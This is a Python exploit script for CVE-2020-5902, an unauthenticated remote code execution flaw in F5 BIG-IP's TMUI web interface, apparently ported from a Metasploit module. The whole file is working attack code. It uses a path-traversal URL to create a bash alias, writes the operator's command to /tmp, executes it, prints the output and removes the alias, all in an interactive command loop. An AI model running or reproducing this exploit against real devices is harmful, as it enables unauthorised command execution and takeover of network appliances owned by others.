#coding:utf-8 import requests import json import requests.packages.urllib3 requests.packages.urllib3.disable_warnings() import uuid import sys # tmshCmd.jsp?command=create+cli+alias+private+list+command+bash # fileSave.jsp?fileName=/tmp/cmd&content=id # tmshCmd.jsp?command=list+/tmp/cmd # tmshCmd.jsp?command=delete+cli+alias+private+list banner = r''' _______ _______ ______ _________ _______ _________ _______ _______ _______ _______ ( ____ \( ____ \ ( ___ \ \__ __/( ____ \ \__ __/( ____ ) ( ____ )( ____ \( ____ \ | ( \/| ( \/ | ( ) ) ) ( | ( \/ ) ( | ( )| | ( )|| ( \/| ( \/ | (__ | (____ | (__/ / | | | | | | | (____)| | (____)|| | | (__ | __) (_____ \ | __ ( | | | | ____ | | | _____) | __)| | | __) | ( ) ) | ( \ \ | | | | \_ ) | | | ( | (\ ( | | | ( | ) /\____) ) | )___) )___) (___| (___) | ___) (___| ) | ) \ \__| (____/\| (____/\ |/ \______/ |/ \___/ \_______/(_______) \_______/|/ |/ \__/(_______/(_______/ CVE-2020-5902 UnAuth RCE Vuln Python By Jas502n From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb ____________________________________________________________________________________________________________________________________________________ ''' def tmshCmd_exit(url,file,cmd): tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash" proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"} r = requests.get(tmshCmd_url,verify=False,allow_redirects=False) # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies) response_str = json.dumps(r.headers.__dict__['_store']) # print type(response_str) # print response_str if r.status_code == 200 and 'tmui' in response_str: # print tmshCmd_url print "[+] tmshCmd.jsp Exit!" print "[+] create cli alias private list command bash \n" # cmd = 'whoami' upload_exit(url,file,cmd) else: print "[+] tmshCmd.jsp No Exit!\n" def upload_exit(url,file,cmd): fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"} r = requests.get(fileSave_url,verify=False,allow_redirects=False) # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies) response_str = json.dumps(r.headers.__dict__['_store']) if r.status_code == 200 and 'tmui' in response_str: # print fileSave_url print "[+] fileSave.jsp Exit!\n" list_command(url,file) else: print "[+] fileSave.jsp No Exit!\n" def list_command(url,file): rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"} r = requests.get(rce_url,verify=False,allow_redirects=False) # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies) response_str = json.dumps(r.headers.__dict__['_store']) # print len(r.content) if r.status_code == 200 and 'tmui' in response_str: if len(r.content) > 33: # print rce_url print "[+] Command Successfull !\n" command_result = json.loads(r.content) print "_"*90,'\n\n' print command_result['output'] print "_"*90,"\n\n" delete_list(url) else: print "[+] Command Failed !\n" def delete_list(url): delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list' proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"} r = requests.get(delete_url,verify=False,allow_redirects=False) # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies) response_str = json.dumps(r.headers.__dict__['_store']) if r.status_code == 200 and 'tmui' in response_str: # print delete_url print "[+] delete cli alias private list Successfull! \n" else: print "[+] delete cli alias private list Failed! \n" if __name__ == '__main__': print banner while 1: url = "https://x.x.x.x/" # url = sys.argv[1] file = str(uuid.uuid1()) print "/tmp/" + file,"\n" cmd = raw_input("[+]Set Cmd= ") print tmshCmd_exit(url,file,cmd)